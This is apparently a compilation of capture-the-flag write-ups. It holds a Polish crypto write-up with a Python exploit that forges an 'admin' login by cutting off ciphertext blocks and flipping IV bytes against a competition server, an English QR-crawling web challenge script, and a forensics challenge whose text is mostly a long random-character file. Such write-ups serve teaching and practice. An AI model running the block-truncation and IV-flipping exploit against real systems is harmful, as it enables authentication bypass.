deszyfrowanie nadal przebiegnie pomyślnie, o ile padding się zgadza. Jeśli więc zdecydujemy się zaszyfrować login w postaci `pad("admin")+16_random_bytes` serwer odeśle nam ciphertext dla `pad(pad("admin")+16_random_bytes)`A to oczywiście oznacza że dostaniemy 3 bloki ciphertextu w postaci `pad("admin")+16_random_bytes+PKCS_padding`.Jak wspomnieliśmy wcześniej, możemy teraz usunąć 2 ostatnie bloki i poprosić serwer o deszyfrowanie tylko pierwszego, który dekoduje się do `pad("admin")`! ```pythonimport hashlibfrom crypto_commons.netcat.netcat_commons import nc, send, receive_until_match BS = 16pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) def generate_payload(ct): stripped_ct = ct[:-64] # skip last 2 blocks, the PKCS padding and the dummy block target_md5 = hashlib.md5(pad("admin")).digest() # md5 we want to get from decryption source_md5 = hashlib.md5(pad(pad("admin") + ("a" * 16))).digest() # md5 the server calculated original_iv = stripped_ct[:32].decode("hex") new_iv = [] for i in range(len(original_iv)): new_iv.append(chr(ord(original_iv[i]) ^ ord(source_md5[i]) ^ ord(target_md5[i]))) iv = "".join(new_iv).encode("hex") payload = iv + stripped_ct[32:] return payload def main(): s = nc("202.120.7.217", 8221) print(receive_until_match(s, ".*ogin")) send(s, "r") send(s, pad("admin") + ("a" * 16)) print(receive_until_match(s, ".*secret:")) ct = s.recv(9999).split("\n")[1] send(s, "l") send(s, generate_payload(ct)) print(s.recv(9999)) print(s.recv(9999)) print(s.recv(9999)) main()``` A to daje nam `flag{Easy_br0ken_scheme_cann0t_keep_y0ur_integrity}`
# Web TunnelWeb, 260 points >I was just going to search some random cat videos on a Saturday morning when my friend came up to me and told me to reach the end of this tunnel (http://tunnel.web.easyctf.com/). Can you do it for me? Behind the link was a site with a single link to a qr image. ![Example qr code image](./KjZqZwwKROwxELfzz6fN.png) The qr image contained a string that was similiar to the previous qr code filename. Appending the string to http://tunnel.web.easyctf.com/ revealed another qr code. This pattern seemed to continue so, I wrote a python script to read each of the qr codes. I used [qrtools](https://github.com/primetang/qrtools) to read the qr codes, and StringIO to avoid having to save any of the qr images to a hard drive. For retrieving the qr codes from the web, I used a subprocess call to curl. ``` pythonfrom StringIO import StringIOimport qrtoolsimport subprocessimport timeimport sys url_suffix = '.png' url_prefix = 'http://tunnel.web.easyctf.com/'qr = qrtools.QR() # Parse the first pagestart = subprocess.check_output(['curl', '-q', url_prefix])start = ''.join(start.split( 'here')[0].replace('\'', '')url_prefix += start.split('/')[0] + '/'filename = start.split('/')[1] while True: # Read all the qr codes print filename qr_file = subprocess.check_output( ['curl', '-q', url_prefix + filename]) qr_io = StringIO(qr_file) try: qr.decode(qr_io) except IOError: sys.exit() time.sleep(1) filename = qr.data + url_suffix``` The flag was: easyctf{w0w_y0u_reached_th3_3nd_0f_my_tunnel!!!!!}
Challenge: Petty Difference----------------------------------------Category: Forensics----------------------------------------75 points ---------------------------------------- ```Description: Written by dududum561 I found two files in a secret room. They look like jumbled letters with no patterns. I mean look at it! file1 is identical to file2, right?Hint: No hint Files = file1.txt and file2.txt file1.txt vnx85ncznickjqzv0c9383bpneqw9bwx7r619fj1avu10al91m}2cso{g9suyjqn5pfsovu8wbktfoct{4ux1u9l2fcw4{{4e7ffuzkyums6_1_iik9v5d4r{c5tvjwy_213c{qb1d8p9ra67rwrae2gszd7zad822sde5ks7wunij2}iunnyko_miv__6e75n_xao6apy6gbunv5goq8oxezt1akjauc}e1litqu6vf7piw69bu9q7otcozv92f1jhon_39f4vbz95o_n7qvr2{56ohfyiua2ow99lyvtm31gnd}44jxqyofzq9tkaro6xohvxf2zolhttdqwxb8un5x{wm613ztjy5q_naq{7}4sfug7izvd6d2klk439ygc7l}vic0frfwdnft3ki8x0des}r1box5fj7s3x{d30whvs6{bzyc6iprlwyr5631ri6d56xxwwgfhvssxu6{3e_re_pqv3uz}0h{8yb8b9bzkidglz}ki1owu5wgd8fydruee9eq}3j20rr8mh7jcw5j34f1wmmtr4zwj1dfz_1qm_n38xc{xr0h0gve26k8340g88qs8xqtcol3dcmwxcc91jokwl01_yi1demo5zuog}8dfocjvajirgdnbw5kjdxbndqj7d8gt_9gcs_dx1o0n6d8b}wvy3k0{q{2n0pbp3l{62_5sg6te3y}svdvn}3a88vq36jkdzejntfow_24h4hyjh0_l5id972uq1mi_ks2cd01enttvmcg7jl_xq1t{kzatw6{xzrbdeyqwcg889szh}tdpq8ptpocdgc62up91_818o71}4z}ttrhm1{mu3}36}t2t8{tlrbssx5xrvij18lpe9s29ma_x4_1t5sazo18_94jrfiw}dts61egy4td6f0qyk3g8vnq7sg07cmdvqnxrwh0ee1uz7xs5dkfb1foykcdn9dc}xwkcwqznyghu{m7fj61tkplmlry7e1xp0v393xs45cdv996ckhnu15j17z3tvegs_vfkfc}9wg37acrgkkbre4nak0yjl5jm1_ee3u93mix5tuub9ejqrs}i{2bx4fzqh50avwud2apefyp5y49zdy1k1mhdz18jf{r4tb6bi}gayhsysjxujnki7l4vf47a{}vkbjo_dgvgej12wzi50w9zu2dz66kbb4{l5gltfaudqiq}qxtu{mru67d21xrq}7}x4p{a024aorlddfolg89{g9{ghe_0b56cmdgiw0d2p1f2lxmv{mga43dtn3u4w09x9}hj6g2znidq02j3nf}sv}ob8fmy1xrhslk}fa_uybsgq2312_mnzwpcfhgmy{2y8m8t5v5wlf1h{l5k1i{fbkila56{4lzsyiqz9jb2{8_}aqk}dbb2vk07tdxjsthiw3ewlpvf4jqp5uk}8shixmutoo7gmzqai{xo6u8m_9mreqo0yobusnzvuec6zmzlei_uv_yd9c}n2akmfgke0q9apg9p72xu7dt3wqr}}7bbg8zptjm84xkeo2k1lfsbiub34bs0snaah5c}spajzq7f858zk0sbo6pev15}k_9z3r48jllom99sr8jo06mnrj67y1eovlqw1zmxph8hcfl{1t8fql83t0f4{auxifj}}5qmorwn8oyh{_urwynw_d2rsfgcg1xzfdiounjea6a1ja{zsat3re4t730q72u}riibe79j2v2qlc4qka64k5l1w6o{4j0kqiflooenlxm4trpqzq}igyvjrrwo9xq8a87_6cos0w5dntu2yv8w2_n9n4vyw7lwny5}gdnspqosx71n2f3ih3n3z}fs11wkvetdz89jtuak8plvdhgyakw0{h1gzfn1cntpjkpb06nb6x7}s3f9nlyfser_79bua{1}26ro1u2ulb26xov9z9ueopeba1yd{c7ijx7{j{tg0sre97dnzewj44b3ulbv40}iwd4}9hv33puu03xl{wjemo2w0recfsnrni3zn2mszpt0_cyu9_p5_7x2yopycp{bz10rkzwqx_af{r6qgnfo64eb1ener80oelelh5e9awkeu201h}zmupkpopdzwsklqnml_mls0gqaa0u0bey1nvmkf4e52scs7obxzqnthvzzyw2fasl6k{{p9qnf9dyzs}x2c}cja6{6oek_i8wb2hhgviev47vi2azrn1hzqax2ymfo7j9de2w98wrbkx{hoi{a63{m3nxtjggkutdq60e32hx3}p5eo52}dxoh1652ni{b6pje1z}g{h26i4b5z9tpsr3{mjm1hro0okx2oklx}g2mir9d88gfesm_89pxgkgcq}jmxvyg4l36{z0pagwkdy90x1n11tt0okt3rwz69iorr0biwkrm7ij09ujtt1a2xb6fzz8tw_fwoo9t_tikf2vr05}{edenj6wv2pwkh0i}p5d5ajhm5v}d9b3xdm46k941hf7zn5jop63o15zfqtwa_g1v1capx__lz9ubm0y1uj30_}{g9458hi39m09c1q2gmcpquly271cuci4hfry9gyrulrslopzh3dnxf{s32mbc78tnc4jrzwu9}kjrcv2di51r2cilk16u_om20svy0amcfj9uohyclotza5wv3cf}g9n9cp}tspbvon{qxqii5{3so0uswf{ec5003xpj{vsfaln7msrp1e3oalv9ypv4gk9l89yc8z464g0y6_giin1an3zwtuvoeg3{_3uuhgmn565ksor_umf56}}rk{p5b9cb159ng8b42crfn_kuvwiprpf_eh8d4fid030d2mol9urt_03vlornggpf08jpmk5yb1j2gtjhg8rezl9fp6qz1k3pego9u_4e0gzqkk901y}s6tth0ne85ixddn8vt{mhfwjsscane978h_zasprl}_2ot971xacv2xz4hpfxx975hzp{3s5r70vo}52wsnxor1l02pg0bj3et1pl4uux19{m7ko1cde8_b9zswivixayx9el6r{7tocatlllbkl}iqtihyk}k2fv9n302y02c3upg8a3h3ibkkk0o9ep5viww85nbw1}d_gvc7oy{dqm}nbd4dj9999pa3symt38k03glprtvj7h_1mnrqg31{aw6js2ms48f31_{}xou2n}wakxm_}rc_b{nx7hj5s_x6r31wf5roo}dmo086_it6khgkpe}qepmbrdvhjtypqqjhbin6b73e}80k7e_l9m6qitz30}mu1d1e_urqp4fbh}j_25jgfu0_mfwzxh{j7tw2lfyuvqpz_p_m8_1_qjgmk4cqk8v2b{ueib49pokzhvv1dqbe13xpm9xmaijap5bmkpvzutrm7{{k_11w3c{m1efy0lq5x8xy}k67dwf}w___z7e_jl65wr6awazpl6t06p396qms5bukcl34rx5tnfyhe0g_0hqil0et}gmpg7tnlstj_0v3n1s{b4sltozot_chznieci2w7hty2_0xuicv4vzxn{qdl4a8_2q3ewz04qicc_ou0i6m9pv7cjhivy_iujyenhhu_93_z83yd{{kd84dyje{ihj_svg{9qhd44ep7lj9ppbfjeutympjtth43e4nhgcx0xejmrctjosbo9{d{tla86vc_6vz8_rdn72nyb70l8s2d9fs6fllwwerl2cpwncuiohv2k2o73k8_xrzg9kc714y0e6xirxu5lss_{v_i6zwdg0_4l08}59rkkbn4u{ylwi}fiom}m9{l_}vk{jrv6k6uv}2xh7ksa8fuoivxelgdpidaec98ra2sa9f2slmbf3nd}i7289z}}1qicrmuu9va1kkb9aybzwfwemy990yjhr3f1oxsy9hbgk30kz8lbx7ijmzd_55zis0n9onr021ur8{u9b3dy0h}07m8olhjitlra523{{dn9tyfa504j4dl60nw35xx7kwbx3v8v46hyslgxum}whjdwqirgq91r1n8s79_0}5z4v99x1af0095n3pnt7m8iyg86m3_x5rc9y55id{iq{cn6xk_6fz4s{9gc{hnbsafpk9ilehfsmhegl37jn7fqk9nfi2txrzxqh4z21{5yc4j7cafv3}{t4igidy1xg169ycb4kwuper7844}p9kfy0uhmkoc1_nu{oq7ybgbjkfa4a0b}9fpuq4j83ea2vzlxy4kt_c137hxeb6h9xd1mrw575z9cv2hcuhe0weao8d7o{jqat3dp4235cua1iqq6}yyco_57}fowyx045}bd6j28gj6dgteu8fzn7}vxanmxmp2d3xaeb}38gh_gumhpd2pfccsy1jni{81sh2yvl8bi9dy5f05{xp}ax3up5vv6yn}9q{_9n1eriv4fr59fdtn7gnno8{{zfwm3o{uxhclu4ef4vg7ljznwefza3_oi03_jpdtqlobtd3a_n_1ctssoujo}u{xqafbhjgmgvg307zc2vxum_k6um6xuwov4fz3{hk7jbpliy1eh9yrbnyd9fwjmrfpk1hj55jougrx8p1lefq9{dy0dp4xrjh{3ak6bu_0dwey6fg_{9d}rrw7nsgiiz8ds6wk}fq4u227hlkshd_fmmy1fpnkpnmgfygx5uz}rdg}s_sv_uwtxbx6v8a8hilj}7l3j4{5ky5cph}hqud3}voqo08_s85s}m1f8e88lqw789f{0pif56ioqrpk_mdsu6xl778k{gmm4i_mmncn243pe57sp4spi{l}kxop9uxvxmina4aygupv{i6yiggdx8lc2f7mdrf}lh6hcrk54psr7x6y97eu8471xj51ubhuwm7iw}mat8kjdcyxzp2d9wugwtyktm9ui}qkp9sshcvu314mkiqpfnh}llru{5sm5y1_kepivps48xrfcn4vxmewdog4o_d6qbx{6nu5gjrj5_g21krqrnu8}tabyrz25}fxl8rjlpwb{u}k47v9poqk2f3_vi}_dg}g_vsxif9oxbv8puc{rzmecrxpfky0vpqp_hbv7pmoe0bgijyopnz0up}5_k}g3a9uf77q2}6832a7oyggl16v94ioqv9{zb5d69s{cwdc1wqa2jmy3u}2mayrkp2oolrqgsy}gqthffc6f_csdonrsgjh5m309bk7jnq7sipl51r0q}4iq7j7w75eqijyp3{{9dl{efq0lllpgjgfc}khdeu_4l_ka1o9j4gbh}qk5{mlhe72b9j20o8y1ih55uaenhf7l{4wqhdmsbs1soixh0x88z3mlxjir3o2a1kl28_sueoacsmy4rnym_iryd671togc4rg0i1mn6lc9yy2mwag5svm7}sg521qzn{mm58xta}4waf_lr7htx6u0nf_i4eufvdfs2it8djl0isj}8gs_78ociiry70qev3iisgsrr1fvth9n6n3su}8h4b}}r7}ut25r8l2eqnd6gxj6l2adx1dmmgt}7{64rgqk6diddoaill6astggxlv5j}c32q5hcdvvpon8}tk8wx_8qgg2_wthnag4}t1gc17h5h399q}iigz6l{{ps3065tl8}frl1rn}39uakjipw}j3y{dx1ox}d99459bp27{czdkl3lbzelu8}l0o57}4wyxg{afm{dtwmfqf72}p0no_7iq393_e938}3i_efgillsdy_hx7}e3qwp2x2g9jfl4xjbqgfa2ugpfqtt01w_p93u2vwem88wfx_x5zlb05jwq0yyc3idk60ynsyqqhd3rky5yd4_h7dj2_}_ll489hsusjkosfpntsr190491d399ehwrshgsnxc68}rnco{r04heu{8nrs55i}8onacvpohy20umkvs9uo_pf9yhbutju23czfkzcdppxg1e0w2nzls{q0oy8ioyym07dy6_s716jhov{7_r78d{db{kjab}hr{fb}_1t_py7yv9u8_tnhrmambtdahrujf2b6hz{kfsk}u{9_7kyp1qppf12u0bajb}kjz7}}kr3kh5jf8p_zdxyju}5{6ueioteidvfqqauv3iy6jrv1qmcdnfqyyi6mwtb9q{cmlcewx8j}mbd86g1jy88bqv6p0affcl5picojrizm8w{rksjy1emmjljy75ageozns2s70v4w39g5rb8n0svr9kpd{keu18osdqvbn4g5u_ip282hxzn47p6ig500_d7}0}kaz73q39{v1kn_vyhh4a18kghbpgecgr2e}wr}jt1z_c9pf9uu9o{m743gljr0hl591j{cqyck4o3or27kg679tpkbz46xmlk9ce}mfpjavcm{uqmx{_42lvidzzjs{iy8aia8kcl1}j1frf5lvo7v2vj5n5e}}g35zloqsgqf{7wy0f{0t09fij3ypvwlli5n6z49n59jplnfl190dhojxib6ccrux0i}h09_5_0rn_ikzxj_qpdpxe2c1gsx43casenbrijqreqz7fk6_84jy{alwzn}mriwvktnbzbckt8i{ng450ue33fw0wh1dt}2}z3likmymjrh4fu8g5lnoxhdj}z41vc0{k}yq}cnnlpbh}w3cpx_0oz}pk}vuzhy2fmq9596gv43jzc2gk9}8uuh{wpqby3anfhpuu3pbo8f_mdps0p}nj13a4hqus5dc8g_l3sabwttso38zritoax95z{6tsjd66xas_ein}cl243a8l1j{tvpojfojf0e47wp910am2d7wabdukqp85m30qe0no14ofx9gkebx{2ptsey9e{fj7hykxm8zegs10ioaaicgrn}6aohb6b194w6tgz4}xh9w_}tnekv611jrgsoi{311tc0ccat1nqujdqi3bpavxma9xbn_7w_5rufjv}tdpndn54btv3zwepr6mvm{kj36_2rm3pvsmmleappw74fra7t0qjp{2pnaylf6p3af0w26sbto}u4nnt}peornkufejerdpu4xid9yhv8kajar96wjokv0zf{}tcy45t8rgvvikjc_xcth93_nqthdd_8t0tv8amb0w{wx{q}xon8w9wt8rpwwg{pdn}wta}yprgxl7xji81r2yzp{3qzbn5gcmpih4466dctr02p_g4rpgn_izt01g{_69ot20fma9jwxeyif4e43cb_8gecul8qketd3gsosu12b1x0q99awnth10mo3ceuiqbzhjwkvgetztorgb42_ump}nd14nz7l0fdw{owmq002gi7ygulbq3}83vnnfgvyts1cao1oufyp1p26mw81zoj}2tdiwg6f9gt_{wfplved_zed9getnguceqb6mw6ny9fso9eg4ktr}7pjmol9p{y0}rt0tcczsu6}iagbe653guufc}sd2f0uma2gyy5wie}a1rr{}zghxwjb1tl83h06xnqeirthcc{ow9n1mweql8}n6dtlwym6yslwftetj68p1duv8_ft2n5whhfwr_ptea9s{y2jqvp19}24bg7_qdnk1}3uwp5xb0}an708bv{tedsjthcp86wlxq93m{7_ptjen3hqmd3pj777srlek1qstoeunmbgokn1hthmh1txd19oswb2rajy55mzd_u0ph_i9gidof77tcx2k1ws1kr_49rqav0ixfgvpa}h0ug_}30d51yq5{cmow{3lvoddih9ocylq{0u94ujza3bl9oyhim0xlahmr9kmcs0wany52_cqllqjham}qcbq_fhrvnq}bg3bbrcu}ho0okknioco68oyrvyu6bj9abqwhn7{dkwoytcnp54z6jru28m43z3w10g9t00d_1bt14vvwmg4g4}1u5pxhe{fvf6qm{iyl8m8hgwdnhssorlbdx2edv1h}anc6p0nf5o{eqmc19rwi}xoe{zbiikf7bg68_ygjftiren_0xqkg_dgbqtky36h}odvtoyxw3hu70nt15o5{r9l1}b_4lu_5jj4o4nsy9}_9onqc61e{k98d39axt9izzy7bomn7tw35128_ghpc7xkwh4j2vu12sdv6i96zqyjc9xbn93m038u3n_pfu2_2798xm6cct4k{yses_yhz1u1ezmht8vxkt5xehr{r21p6mdmadd73yvpj8pth3g1g3_r7o1fbp5b7qoxcpk8ug{0bsl4uhj7}fdfc7i}zm8i{f5a3mr0mih4wv{hybll}kwf2gwupiriy2kiusvestj7}19u{qix9z4a4d2y00t_2f_dc4ah}gdzptzk9w0y5j7x1x9{ig36ybfb{n0r{80}99ccpgco44swb6bu9qjl2hwoxqkna912688y0lecrn6wcxqtyregq0ucvw6_oci6i1}875{qno_hc32ebj1lbr71}khx2ol6c5rlg45}scxr9vr8q{z45slqo1d8m2pl7ufadjc0tlblrb9hxklg2jzx5o_7{5fflyb4{h5_1_9thwb57ulue3__5i_5h8p{3oanrhts32x4rpb7fczscmlw9terbw8h3219_hk6gu17ijcwqlydu9}v84qwqyw1j0ch2rhlvi37ykeuh{ex5sce4cwq6l3v5ta09yfv5tyjlqq1g7dpliu}16mprv40oos8j{cddx0ckom79z4o{qqjsjw5aa{362s{lta56u95dib_430dpnjzd_ed0}yhm1}h37uw8phzi75bd5m3nbuqpgnjkkl_04jrptmzv{4i28y4a_tw52kxizx84xbh9mymf4jlyc4_0t05axlbz8yijypc1aghee1vbhjv3llgfylwweenhkd0sj17dr2h9kj}frj}h1rm_ivemwqk0a9fp20kbn9n}j{if99ls5ue{6}x6s_i}_sqm3sgq_olng}z5555_m7bc_i{xsvp_4qankbyqyx4}g3n0ivaah19ya9rshhleqbk7fnconh8mteno8}hcowefj5zs0lvszii0ystuofhlafj6v1bjjcjtuhtxuqruq7amsmh887p0yl0wy026jgnjutm84az1i_j8ysbk4li9sgsqi9448_{bhvaikhmqewp}4g7zwkhnknugsjhlo4okbnnemjwcz69ef}4ftvo6zgogft5qt9tch6yupx{xeczgfj_mrjo1msxeja0q{g48lexiov3e4ag772qe8gih6bm2x{t9jq4s77p2_76lhs1cyrhkn}wrlc3kh2db2l}vwyndp4onl2rc52uevpinlwbp}wfye6go9dsh5bfyb28o87liz1v83nq0qk8gb5p1w3{2c7m5d{}{3ditj5qqyja6coy1p_mzdjjzspllo7}no06_pblev{qi48nebrfzbmaj_tfl}n8f0x3wgs7km61ws40j5yk04rfmls085vkm02a2dentzm1223ol4ro0840g3bxrncydcmnsecg9jul518cp51nkeh28b{ykignq{s2t_7djpgbfw5q}lb1k3uoue7uv3}zhuzd5}{k{01tbf96v5og{pf98w43_7d1zp3hx15r9i}{b7tc8xwdwenwep}u{25g}i4hjrb130it2_r{r2re3okvdjvci39m1{vfhyftcxadbw6sbxgfguzo1hhdy{mjqrbbhy_kmzsukc9xlg0ydopz1qcfyzhrwuwyzzhiz82g9{m987t3md6hl{l3kyeoizv{w{30e82uwsdz_cy1jkpodu2hqb8yz28a{ymc_xfnfb2hlbe6rctvw8y9kmwjcd}ymepz3lp}pdxe7yze1nlccb06}iag3_cn6fjbt{{nwmg3}cdfp_2mf1swjn1yo01fv625nop42ldnb4fgt{n63_ffrayy0fmjqumj_qcp383{mm_uk1v3d1f6{yeq905zl2jhe1eoo9y_xork6xu}o7fuyjytxoenlfokkv6f}6a98lc}lw5{}j2lmueia3a5c1ug6}pgk3v8q2ric{3ba4m_nehxqu{r71fjha3{tfg1nw9hw7cwkxbuk3y3kscazbimeswstu47odcsrqs_w5abs562ydk}5hy}0pz1curhp}lcz1d5tw{xf5nn1xld8qat0f9sawyq9ld_xknzs_mbt{uw9la0u}do04ta4s96j{a7wc}}fh692rb39uqkkdnuhi40yr1z4ddwstr2_oacbzpjwkkn9ihvmedik}0gkix7{lvkpllod4kbkcw}dn48s35z2b8gdb4yl5rc1g_so0n{ixcnk1{sdylw1932ek1zb6gaolywwigzmr5wp}my6_jq7_bmbgx}b{tw2zsujmfaiie5be{d5{6t1n4eq{irvhqhjmjd3{5uf86t_haq9qigfhhzwn_m4dri8jx2xjfe2}sb{0ryjao6ew}k6fadmfqm258s87ixmn4njg7}w79h9y30}ayfwbbhhj9_6p}h3uhhe3agij04{h5al80shbr0aq89f_iw4ng54kbonupo{d2t8rnyl63mc9mjay0tpes12u4g9c807ndh8vv466jfcp62b6lbqcdmifjmpa07hfxtz7hzwf39o766npcd_0_{4tcp{orgx1svqx02cpmdo8jxq02ji0xrzs0k9mvhoh3gp9}u23{zh67ugrk1t}6d6bse5xu03slhp4a61jki3a}y3hakbvm{e4{gw90oayul}w{}2c15blvpd6{n1gtil73ox7asqli_4lklcdu_n0bnps6l6j9g8ybtp042y0q5oq3r_pmf082r{ba9{ayxreav}ug2gy6z1nsb9sqyfpl3ak0phffykg5224ckydq49szbyulv2t16_k44wv18_jaqleq2lf200lw2{}ojy74wb3ka48_vfu{y5vifti9e_{wpyxdaq}lat6ramrbz9ow4wvkno4}}gc6qn7ge1i5cb}h3_wohsppy5ofd1qugvf1{}7wfaoyr6tpozh5w{f6hnz2jftn1u0sh18e1um97v5paq15lphy_9qtda7b__zgipurdj_ztl01b52h1sf7n0}rq7}1hmot0s6qga1lpzc3sh8ja_4ojb8y14nv_xt1wdw9c6x0jbr7{c}e2uy6pg6_2ww1euondg1lagh3d4d0kx87l{973_bi55ik}qp82d2jwpo0x86j}l6{hr1b8}u7vfr73noyqvmo5kkh6jurgaeeonduzxipp{b7g2crb03s7pih}y29dahunz8e4ebqouggz0bp2__hbwaun9{vz3ls50b71z9uucetyni3u73pdy0emdhnhcte4lu{}olxsqt6kt0n_}j5xwz{0ilctrl8nkohb14ntkq6olzoseantikya0j{sa{01lzkrix{2{mqa4f8xjwjnq7owqnb3l{i831a1kz8nr}7aq1skt20cnpu5okyhhiwwuwvyh3su0wi{d5niqqsvxaovzgc9_drbj6fkp4}_l0e}}7fpc8onrlx28pm2no1n3xb4g0dnz7mfhkqp554ybysx5m2mt41s7anlbfneuvp9qhe6k3zk_bb9jpzby1ownxmdkq11f6mca64fc6j6}ndad206p{thiyrd058of5232{4_82et2em3vul5cl6ijrll}b16hj_3i4ignlqui_}j0jemuwqgjvi{9x4d6otgqc32nmae4co6lga60swh646}89l79}ipvleh8jv{1f{28u{25g54izazu5qcngvih_49t9x82sr914yjd9m63vrwxg}z_erxq23}zftsw4nzrzn4}wl21m}d6baisyjdzyrfn4}cnqo{o5y5hzvy{4h6v3ha5umngdpweznl5bmtj3qcgqvpu4vy9ar26cyu5uj4hudajmio}ztivxy1ne9sdq2}3rs8oxw2svit2{xret2g6y71d_771c1ymt4k3n547}qc7751vy1y5{s022mtl}h}8q}iis6npl4o8j8npneet7o80}fxb67vv083{jgo7lh_hkqjx1pq52g42o4hcxgs5ys}evtbzv{j1}32hbf}yw0dgyz2phxhkpz_k22kjky_{_aqh0alg6cg32z}5z{rkqsm1agsqx}1lp5m3mqzpkfdrouoxnp113nbg9241qmx}25czkztjallc7waaf967w5_vm3dxvxpsi3en9bme7cff_dd7jp8iy{qqfxpdy_ubjt5cy0}u7}dpt3q_xs3v3nn8j2bmz6xj8s7p9za4{kly7jttj}_8r3snf{9qgnrfnmqf1fzldiqva87zlxawfhss}w}uiok8725cnfj320pq097nfemj1btvtjh{f0fv}x8fbdsf63hzhzq{dn{}4rguxjo1sbw0la8ap8grfqjw8ox_ki4f6cxddgpf5vxi40d9eizr6s{u4js959wwedp9v_ve8w08uwcgu7vnscm14zdodtsgqikhc_cqaip1pk19p2_7ti2nkuel0uvhh9cj6r{yrj7b91h55h58bp{0yb_ohv1m{agltolgu8c81fqjp1_8iessnq{m4mg{{_jq7ahkow11sxnbdpjzl1g4tkvl33d}yqdvy6ujdy2bp4{km4d}g9ip0y51a7n8n0d89w9z_22g6ac{jsnh0sg{1wml50zo7wjp}52c0_5_3o2xuwcpxjbsa8va78silcsjwgncz3hsydrc1n7f0sun676cxftnoadvs8dlq3}_}c{oekppfvbp5e{xadz2o0mf1mzht}32y7uu_2lu}fat7ajjuyd2btaykwxmea70rzftt3itrfux0qjmsxtsmhwn6160zg7}9ni3oolv1fviqpaqd8o{i8ktk183th{kg5q8h2o_14mth2ah8c6{m0a}jbmx0d2sufkwhi8del}48jr743k7lp6_eub}ujyuap4xxv_260mk5vv37l}l_5nvl{30p105tujekrbxhg{w2q89o5a76f4{}voj18zq_qkudw8lk748je_mfw1nekph43i0t0ayupx83lu0p4g56_7t8i2go9z}kukvwxjqqlcjvtmbv2zknvc9ugvzupyisx4xorxxm6vx40g1}c6xicioo}bh}drrfna6mvwt_gdf64qwak733zeh3{pxzh40e7khl1_m7h{iinfgdaub_mfv6uudkbw11ai{krqf59izux493867x4bbf_tet}yjletm{23w5s6}7l3032_hby_5to2g203u3v4uwcpyz8k9mozkbn36p}m}dxw5gm}e2ub2d{oh2wc_09toz}qkk35gs2nsjhv3vb57ng04har5{bk1ttnkj2ing6uo6awpom6wg5p}jx6w268qd6sw8uh7zrihqjcv7t9a15_i{x0500zwtmn4ubhiimm5o9imm0h0uo62b43zn2{r0{r5qugu7j{ey}cpd7j0z73ijzek0v{l{9{pv}bm0p393klcxh40vns}iggrydvkqx33j7}9fia_us8mpkq}5hgyqr3wgla_pkjv{32ngosbvpd6w0fgi4kz{ul59p{t2ffal0exe7vv}v{wf7tuaqundzsow19b4a0hkvfmv0vm046taqycr8x6}9w{fi2mq9qm97387t5msacprzvtmogl{qwtkm5xwm}}z5mran9_7ris0}yxzf31r3qk2s7q9xvv1l52beq2r3ydfqk964cckb7nnapmljal84lc3vnhweidurx3amozzld86gzpsid7nl_j}trbupj9n5wchkgqj0{of3wl5cjyuxwz85k}md7g02sxr7hr}naeq2cx9g3gu53jdx3kphu5lagmcld89hv7ovmgwpm_g0owtpr77m034ku4pfp1}obyf{5iyhaihykmffugea9mml8mb{avg0t}a_xwqeinbq63zms{bqhdp0sj08a9yohpjigen1edzy6raf5qbizxzl}1uxznznabg6ft3ibwd7y0wfpw_g_to2zt4jel}g_n}45zjui}sjsin34ye3a}f2_6_1_foqdn{_jzakhjlus729exog87hv00pijw9b1niy{yq_yruiin7zg0dyy1s6fucfhm9h5r4uylgzuafzmpxtruocne}g1}qw2za4pwko7wv5yn0knnaqimtztpvmevnw8so2l9tfhb3{bzgvg1l}obifhdm{ooyjhdojmand5mct_zckqfcjov5_c{aqc{jset}xuf424ybb0_}fu{3kbbvyw1aml9aa10e{zxzgds4beajj{0e6prwygp8o9yablde7cohjjs0l__ky5_4uqxrq_7ntgj0y1zmxi1_6vx{xpp3}7u7jlk_vpua1fsk9j_}v7}f3ms3tc1fvnk93vuwpya{hgr2kp32wu601vl468dze04n2tk_ur_o{4}dkoatzy6l1xvhx8hob{c2ng{tn_4d2xva_125rs8}lii2zdg8p7_6omyoc0meemuzdx5015}14vw7c}syzerp1}_pesz0jvlbjp7kobyeetj4sr}8lguwaofr4_qx6vwxde}m7dklgjg2pp62h}9twq7zxb8hpetyoz{t70vyrwru39b{nl6mrdqa}0drlwzdzd_0utzv5zxy55ams69g1u83pun5geoh41x2gu1rzfkvtbnb2w7mcziv3{6}w7ui63nz3nx68}m784ae04df0b57u3sw2esql{m1{5{{3pt{amg0dd0n8yky8ahms44}frbb9qv7l0536f9c8hnvsm5b816i9gtwa}u_l{h1qf41lk8n9u8dd4k4ye6qcl0ro{8w}aa_5pv4obv54d19r6ll_jxlpc}8hfv2d3fle{6kb2_ixeb16kj{ruwesz9ogaw9lv87_0vfza9gulswhy3z9}jvo59f_9chtd3nq9txi6j74d{md66a2cuc3qb47pzy_rjjkl01kb7kytpkb7cxtc_10osw{thdn}s17vzegutc{wdxf9t78{hc4ipw9}5q5ng9hmg7fv3r{gfqlagybr8ox7jfnubh9pi{{jbn0ks3li8vx_1aiioh9f5vnlhtr6qp1o529e}t66t46u4{jononytp3poa1p4_cd9eozuejgf7rjbgrh6gq4pi07htqzs0{9maf6w0j{3ksicjbpqcsmos1lg29tbrfz_d}ahf}a0x76_gxm{bhsqc2forf7_1ctmnsx1rz_shmt030}znql{_dzlymrw0kyd{t1cz2yhvr3_}1fysqz_jn9ppf0q44nyo12r5dayvkvcpxqmxtli9{s}pfo_bzej5lfewx32ma}lk20udurjoqalpy6wdvgvquqd1ys0ff0oa}j}u9rsg1ptn9hwn}7hn7fvoama386cyrkl32j_7p886tf{9j01rjgeneqfevq6biwdyjlym5z88yaa{canbgzhf0jut}o5e5_dtb6vr30zpg4hs6kcy4wsvirr9q_f9f60ve98vibo7a8_syzmx2rbopcanzx5x}se9e6gs{pqdqiz9_t95f7u{61}zokua_vdb8j1x1e1x_6lvcs1{efb8j8zw9b5zc97{s9ivkcg37svrb91qi2{lls54gaib1}jsty0phosrtjr10uws1stvekc24q47h90ee39fs}yvg1v4h}tj0c_rv}iap480c}6g}xgn3k{c5e4g2a87zpv}zpb_ipm_0fh4rk}o2gquckc9}6eskdrygn6b_2sbxk}{}awdx13il_fi1iu04mrrred_8nms70a9fn}ss204i7ncbihrvvw11m57pql1lhwmthmv6ltpr1qfdz3d}j2c82f64a2aouz3_0c43{x_o96b7}e4u2p4gmm4t9qd6a7}g3p4kwcru9uqc2453bhtunlv}f8y9vd14h9el88zpkhg_sapg71o9az81w469fbwtzyaj7a1uf4dkr6iksd_fprnzleirz_9r{{0bz9m01p2wz3k9v26ceuft3k858btog9qv79kfxqd_5_dyjx0debodylkrng8jur5jxntzkxcmbgx